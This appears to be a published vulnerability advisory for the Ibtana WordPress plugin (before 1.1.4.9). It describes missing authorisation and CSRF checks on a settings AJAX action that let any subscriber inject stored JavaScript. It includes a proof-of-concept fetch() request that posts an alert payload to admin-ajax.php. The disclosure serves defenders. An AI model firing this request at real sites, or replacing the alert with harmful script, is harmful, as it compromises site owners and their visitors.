WordPress Plugin Vulnerabilities
Ibtana < 1.1.4.9 - Subscriber+ Settings Update to Stored XSS
Description
The plugin does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings which could lead to Stored Cross-Site Scripting issue. Note: v1.1.4.7 added CSRF check, authorisation was added in 1.1.4.9
Proof of Concept
fetch("http://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=ive_save_general_settings&ive_custom_js=alert(/XSS/)",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered in all frontend pages in the Pro version Affects Plugins
Fixed in version 1.1.4.9
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-12 (about 8 months ago)
Added
2022-01-12 (about 8 months ago)
Last Updated
2022-04-16 (about 5 months ago)